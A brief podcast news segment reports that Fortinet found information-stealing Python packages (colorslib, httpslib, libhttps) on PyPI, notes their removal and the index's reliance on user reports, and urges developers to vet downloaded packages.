Malicious python packages designed to steal information from developers’ systems have been recently discovered by Fortinet. The packages were uploaded to the Python Package Index between January 7 and 12 this year by an author named lolipop. The names of the malicious packages are colorslib, httpslib and libhttps. All these have been reported and removed from the Python Package Index. The Index is the most widely used repository for Python packages and unfortunately they have experience a surge in malicious software being uploaded. The Index doesn’t have resources to scrutinise all package uploads and relies heavily on user reports to find and remove them. Often, but the time they are reported, those packages have had several hundreds of downloads. This is an important reminder to not be blindly trusting packages downloaded from the internet. We need to do our own due diligence to verify the contents is safe and trustworthy.
This segment was created for the It’s 5:05 podcast